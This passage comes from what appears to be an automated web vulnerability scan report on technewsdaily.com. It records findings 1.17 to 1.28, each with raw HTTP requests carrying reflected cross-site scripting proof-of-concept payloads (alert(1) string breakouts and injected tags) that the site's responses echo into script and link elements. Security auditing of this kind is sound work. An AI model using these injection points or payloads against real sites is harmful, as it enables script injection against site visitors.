The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1707'-alert(1)-'4149b8c4453 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /archivee1707'-alert(1)-'4149b8c4453/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/archivee1707'-alert(1)-'4149b8c4453/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.17. http://www.technewsdaily.com/archive/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /archive/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd4ea'-alert(1)-'75961f77880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /archive/?bd4ea'-alert(1)-'75961f77880=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/archive/?bd4ea'-alert(1)-'75961f77880=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.18. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /augmented-reality-app-translates-in-real-time-1829/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3903'-alert(1)-'7bbd8c68678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /augmented-reality-app-translates-in-real-time-1829c3903'-alert(1)-'7bbd8c68678/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829c3903'-alert(1)-'7bbd8c68678/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.19. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /augmented-reality-app-translates-in-real-time-1829/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df3ed"><a>423825c8472 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /augmented-reality-app-translates-in-real-time-1829/?df3ed"><a>423825c8472=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/?df3ed"><a>423825c8472=1/" />
...[SNIP]...

1.20. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /augmented-reality-app-translates-in-real-time-1829/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ddd9'-alert(1)-'8ecc608f87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /augmented-reality-app-translates-in-real-time-1829/?2ddd9'-alert(1)-'8ecc608f87=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/?2ddd9'-alert(1)-'8ecc608f87=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.21. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /barnes-a-noble-announces-nook-color-tablete-reader-1522/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6fd3'-alert(1)-'0864a4dfc17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /barnes-a-noble-announces-nook-color-tablete-reader-1522c6fd3'-alert(1)-'0864a4dfc17/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40508

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ext/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522c6fd3'-alert(1)-'0864a4dfc17/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.22. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /barnes-a-noble-announces-nook-color-tablete-reader-1522/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd891'-alert(1)-'513c341eb68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /barnes-a-noble-announces-nook-color-tablete-reader-1522/?dd891'-alert(1)-'513c341eb68=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
t/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/?dd891'-alert(1)-'513c341eb68=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.23. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /barnes-a-noble-announces-nook-color-tablete-reader-1522/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5debe"><a>9bbd2793830 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /barnes-a-noble-announces-nook-color-tablete-reader-1522/?5debe"><a>9bbd2793830=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63957

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/?5debe"><a>9bbd2793830=1/" />
...[SNIP]...

1.24. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /better-bomb-suits-could-protect-responders-from-explosions--1293/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d379'-alert(1)-'4014ba4bc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /better-bomb-suits-could-protect-responders-from-explosions--12935d379'-alert(1)-'4014ba4bc7/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40524

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
cript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--12935d379'-alert(1)-'4014ba4bc7/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.25. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /better-bomb-suits-could-protect-responders-from-explosions--1293/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9a5"><a>a04acfa7675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /better-bomb-suits-could-protect-responders-from-explosions--1293/?7f9a5"><a>a04acfa7675=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/?7f9a5"><a>a04acfa7675=1/" />
...[SNIP]...

1.26. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /better-bomb-suits-could-protect-responders-from-explosions--1293/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8690d'-alert(1)-'3572f3edfc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /better-bomb-suits-could-protect-responders-from-explosions--1293/?8690d'-alert(1)-'3572f3edfc6=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65145

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
ipt">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/?8690d'-alert(1)-'3572f3edfc6=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.27. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /blackberry-playbook-tablet-to-launch-in-march-2011-1828/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9705f'-alert(1)-'2865218c61f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blackberry-playbook-tablet-to-launch-in-march-2011-18289705f'-alert(1)-'2865218c61f/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40508

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ext/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-18289705f'-alert(1)-'2865218c61f/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.28. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /blackberry-playbook-tablet-to-launch-in-march-2011-1828/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17356'-alert(1)-'a171853f259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blackberry-playbook-tablet-to-launch-in-march-2011-1828/?17356'-alert(1)-'a171853f259=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
